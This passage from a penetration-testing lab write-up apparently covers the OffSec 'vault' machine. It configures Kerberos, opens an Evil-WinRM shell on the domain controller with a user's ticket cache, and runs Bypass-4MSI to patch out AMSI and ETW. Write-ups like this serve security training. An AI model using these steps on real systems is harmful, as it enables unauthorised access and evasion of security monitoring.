WinRM
As enumerated previously with bloodhound and ldapdomaindump, the anirudh user being part of the Remote Management Users group grants WinRM Access to the dc.vault.offsec host
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ echo -e '[realms]\n\n\tVAULT.OFFSEC = {\n\t\tkdc = dc.vault.offsec\n\t}' | sudo tee /etc/krb5.conf
[realms]
VAULT.OFFSEC = {
kdc = dc.vault.offsec
}Setting up the /etc/krb5.conf file
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vault]
└─$ KRB5CCNAME=anirudh@dc.vault.offsec.ccache evil-winrm -i dc.vault.offsec -r VAULT.OFFSEC
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami
vault\anirudh
*Evil-WinRM* PS C:\Users\anirudh\Documents> hostname
DC
*Evil-WinRM* PS C:\Users\anirudh\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.187.172
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.187.254Initial Foothold established to the dc.vault.offsec host as the anirudh user via WinRM
Bypass-4MSI
*Evil-WinRM* PS C:\Users\anirudh\Documents> Bypass-4MSI
Info: Patching 4MSI, please be patient...
[+] Success!
Info: Patching ETW, please be patient ..
[+] Success!